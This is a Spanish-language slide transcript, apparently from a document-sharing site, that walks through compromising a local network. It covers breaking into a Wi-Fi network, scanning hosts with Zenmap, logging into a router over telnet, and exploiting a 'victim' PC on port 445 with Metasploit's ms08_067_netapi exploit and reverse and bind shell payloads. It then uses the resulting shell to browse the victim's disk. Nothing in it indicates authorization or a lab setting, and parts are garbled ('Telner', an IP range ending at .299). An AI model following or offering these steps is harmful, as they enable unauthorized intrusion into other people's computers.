escaneo de puertos

9
ESCANEO DE PUERTOS Los puertos comunes como FTP (21) y HTTP (80) frecuentemente están bien protegidos y posiblemente sean vulnerables solo con acciones todavía por descubrir. Trata otros puertos TCP y UDP que puedan olvidarse, como Telner y varios puertos UDP que se dejan abiertos para jugar por LAN. Un puerto 22 abierto es usualmente evidencia de un servicio SSH (secure shell) en el objetivo, que algunas veces puede ser forzado abruptamente. Para vulnerar la seguridad 1. Se vulnera la seguridad de una red puede ser WLAN_XXXX,

Upload: arnoldvq16

Post on 07-Aug-2015

68 views

Category:

Technology


4 download

TRANSCRIPT

Page 1: Escaneo de Puertos

ESCANEO DE PUERTOSLos puertos comunes como FTP (21) y HTTP (80) frecuentemente están bien

protegidos y posiblemente sean vulnerables solo con acciones todavía por descubrir.

Trata otros puertos TCP y UDP que puedan olvidarse, como Telner y varios

puertos UDP que se dejan abiertos para jugar por LAN.

Un puerto 22 abierto es usualmente evidencia de un servicio SSH (secure shell) en

el objetivo, que algunas veces puede ser forzado abruptamente.

Para vulnerar la seguridad

1. Se vulnera la seguridad de una red puede ser WLAN_XXXX, CASA, HOGAR, etc.

2. Luego se escanea la red con IPSCAN, para luego designar una ip.

3. Luego se abre el cmd, y se ejecuta el siguiente comando.

Page 2: Escaneo de Puertos

Ejecute netstat con la opción -a para visualizar todas las conexiones

activas en el sistema, tanto TCP como UDP:

Page 3: Escaneo de Puertos

Con la herramienta PORT SCANNER, se ingresa la IP de uno de los

usuarios de la red para luego escanear que puertos están abiertos, y

examinar la manera de vulnerar.

Page 4: Escaneo de Puertos

PUERTOS ESCANEADOS:

80/TCP: HTTP HyperText Transfer Protocol (Protocolo de

Transferencia de HiperTexto) (WWW).

139/TCP: NetBIOS Servicio de sesiones

445/TCP: Microsoft-DS (Active Directory, compartición en Windows,

gusano Sasser, Agobot) o también es usado por Microsoft-DS

compartición de ficheros.

Page 5: Escaneo de Puertos

ENTRAR DESDE TELNET: Abres una sesión TELNET desde

Inicio>Ejecutar. En la ventana, desde el símbolo de comandos, tecleas

telnet XXX.XXX.XXX.XXX donde las X representan la IP del router, es

decir, la puerta de enlace. Por ejemplo: telnet 192.168.1.1 A continuación, se te solicitará la contraseña

del router para acceder a su menú de configuración.

Creo que es eso lo que necesitas. Ahora introducimos el comando set naptserver: Transport protocol [tcp udp gre ]: (para elegir el

protocolo entre estos 3) en el ejemplo TCP Service [name or port number]: Podemos introducir el

número de puerto. En el ejemplo 4000 Server IP Address [self or IP address]: Aquí

introducimos la ip privada del pc que vaya a hacer de servidor de nuestra aplicación. En el ejemplo 192.168.1.199 (hay que borrar primero self, que sale puesto)

Page 6: Escaneo de Puertos

USANDO ZENMAP:Cuando descargues Nmap, también puedes descargar "Zenmap GUI" junto con él. Ábrelo una vez que lo encuentres, coloca el Protocolo de Internet (IP) de la computadora que quieres hackear en el campo "Objetivo". Digamos que quieres escanear un rango de direcciones IP, entonces tendrías que escribir la dirección IP inicial seguido de (sin espacios) un guión (-) y el final de la última dirección IP. Por ejemplo, si quieres escanear 192.168.1.100 a 192.168.1.299, entonces deberías escribir 192.168.1.100-299. En el menú del "Perfil" de Zenmap selecciona "exploración intensa" si no está seleccionado. Haz clic en el Explorador y el programa escaneará la computadora o dispositivo de los puertos abiertos. Mira el Nmap de salida hasta que veas algunas palabras en verde. Estos son los puertos abiertos en el equipo o dispositivo. Si el puerto 23 está abierto, el dispositivo podrá hackearse si no tiene ninguna contraseña definida.

Page 7: Escaneo de Puertos

UTILIZANDO METAXPLOITUn puerto TCP/IP abierto por defecto en el sistema operativo puede permitir a un usuario ingresar facilmente a su sistema si autorizacion nos puede llegar a consumir 100% de los recurso del equipo y dejar destrozos o hasta dejar fuera de funcionamiento Se necesita una pc con backtrack.Lo siguiente tenemos que ver si nuestra victima tiene habilitado el puerto 445 #nmap -sS -sP 192.168.1.26 como lo tiene abilitado empezaremos hacer el trabajo de conexión con metasploit #msfconsolebuscamos el exploit que usaremos #search /windows/smb/ms #use exploit/windows/smb/ms08_067_netapi ahora hay que asignar la direccion de la victima y la nuestra

> set payload windows/meterpreter/reverse_tcp > set rhost 192.168.1.26 (ip de victima) > set lhost 192.168.1.28 (nuestra ip) > exploit ------>ejecutamos el exploit

Page 8: Escaneo de Puertos

ahora escribimos shell para ingresar al cmd de nuestra victima

>shell cd .. cd ..

hicimos dos cd .. para quedar ubicados en el disco duro C: hacemos un dir para saber que tiene en el disco duro

y hacemos lo que queramos ahora crear carpetas, apagar el equipo, etc.

Page 9: Escaneo de Puertos

Habiendo decidido el puerto queda por saber el exploit que usaremos. Consultando la documentación de Metasploit vemos que para el puerto 445/tcp existen varios exploits. También puede verse una lista de los exploits disponibles por medio del comando show exploits. En mi caso me quedaré con el siguiente: windows/smb/ms08_067_netapi.

Ahora seleccionamos el payload que inyectaremos. Podemos ver los payloads compatibles con el exploit seleccionado con el comando show payloads.Seleccionaremos el payload windows/shell_bind_tcp, que nos abre una shell.

EJECUTADO PAYLOADS:

Ahora nos queda ver el resto de parámetros necesarios antes de ejecutar el ataque. Para ello tenemos el comando show optionsPodemos ver como de todos los parametros a introducir tan solo hace falta especificar uno: RHOST que como bien se indica corresponde a la IP de la víctima (the target address).